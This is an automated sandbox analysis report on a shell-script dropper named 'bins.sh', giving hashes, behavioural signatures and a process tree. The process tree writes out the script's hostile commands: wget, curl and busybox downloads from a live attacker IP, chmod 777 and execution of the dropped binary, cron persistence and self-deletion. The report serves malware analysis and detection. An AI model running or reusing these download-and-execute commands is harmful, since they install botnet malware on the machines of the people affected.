Analysis

  • max time kernel
    124s
  • max time network
    154s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    03-12-2024 00:29

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    616244bb402bee04b6b45f703b80d324

  • SHA1

    eaddf7ee69008a10c656aba8958a6cecd0ba4f19

  • SHA256

    43fd86667e58eeb0e59922eb2aa6773f01cbd8c39235dc00904a1eb13230eccb

  • SHA512

    b1c3ac89ae943e25e2657353fa3f06f3fdc85f489cc965c7cbcc310357d75d0b1977fcd66b09aee06aaaf9986246d1c6ee29cda146aa773aaca3bfb1885857a4

  • SSDEEP

    96:82/zFBpXexFta6UdZrD1iyqAIg93GCk9Nbe/axFta6MfdG0rDNFoyqAIg9OWGCki:82/zFBpHxQOGCk9N9iGCk9N6Xz7

Malware Config

Signatures

  • Contacts a large (1601) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:706
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:713
        • /usr/bin/wget
          wget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          2⤵
          • Writes file to tmp directory
          PID:715
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:730
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          2⤵
          • Writes file to tmp directory
          PID:737
        • /bin/chmod
          chmod 777 Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          2⤵
          • File and Directory Permissions Modification
          PID:739
        • /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          ./Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:740
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:742
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:743
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:748
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:749
            • /bin/rm
              rm Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70
              2⤵
                PID:747
              • /usr/bin/wget
                wget http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC
                2⤵
                  PID:767
                • /usr/bin/curl
                  curl -O http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC
                  2⤵
                    PID:839

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70

                  Filesize

                  151KB

                  MD5

                  6c583043d91c55aa470c08c87058e917

                  SHA1

                  abf65a5b9bba69980278ad09356e53de8bb89439

                  SHA256

                  2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                  SHA512

                  82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                • /var/spool/cron/crontabs/tmp.n8RquO

                  Filesize

                  210B

                  MD5

                  dcb50a2d54adfabb396ceace37157f08

                  SHA1

                  efd13226e80511adb239ab33ab8c6b2d682aaaa7

                  SHA256

                  7bf6ec078c9c7b4ad5ab26741051adac4a1a400e90dccd07d0a0c805b4624194

                  SHA512

                  1e4783812e85aa84354c3924b6db8380020b9b238559570d848cf98c1178df9457fdaaf2ced66fb1aac375b851c082b2ac261a9fb125942ae678c9cdc6b73dce